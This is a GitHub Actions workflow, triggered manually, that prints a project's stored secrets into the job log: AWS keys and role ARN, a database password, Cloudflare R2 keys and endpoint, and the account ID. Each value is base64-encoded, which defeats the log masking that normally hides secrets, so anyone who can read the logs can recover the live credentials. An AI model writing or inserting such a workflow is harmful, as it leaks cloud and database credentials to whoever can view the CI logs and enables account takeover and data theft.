name: Extract Secrets Manually

on:
  workflow_dispatch:

jobs:
  extract_secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Print AWS_ROLE_ARN
        run: |
          echo "AWS_ROLE_ARN Base64: $(echo '${{ secrets.AWS_ROLE_ARN }}' | base64)"

      - name: Print AWS_ACCESS_KEY_ID
        run: |
          echo "AWS_ACCESS_KEY_ID Base64: $(echo '${{ secrets.AWS_ACCESS_KEY_ID }}' | base64)"

      - name: Print AWS_SECRET_ACCESS_KEY
        run: |
          echo "AWS_SECRET_ACCESS_KEY Base64: $(echo '${{ secrets.AWS_SECRET_ACCESS_KEY }}' | base64)"

      - name: Print AUTH_DB_PASSWORD
        run: |
          echo "AUTH_DB_PASSWORD Base64: $(echo '${{ secrets.AUTH_DB_PASSWORD }}' | base64)"

      - name: Print R2_ACCESS_KEY_ID
        run: |
          echo "R2_ACCESS_KEY_ID Base64: $(echo '${{ secrets.R2_ACCESS_KEY_ID }}' | base64)"

      - name: Print R2_SECRET_ACCESS_KEY
        run: |
          echo "R2_SECRET_ACCESS_KEY Base64: $(echo '${{ secrets.R2_SECRET_ACCESS_KEY }}' | base64)"

      - name: Print R2_ENDPOINT
        run: |
          echo "R2_ENDPOINT Base64: $(echo '${{ secrets.R2_ENDPOINT }}' | base64)"

      - name: Print CLOUDFLARE_ACCOUNT_ID
        run: |
          echo "CLOUDFLARE_ACCOUNT_ID Base64: $(echo '${{ secrets.CLOUDFLARE_ACCOUNT_ID }}' | base64)"
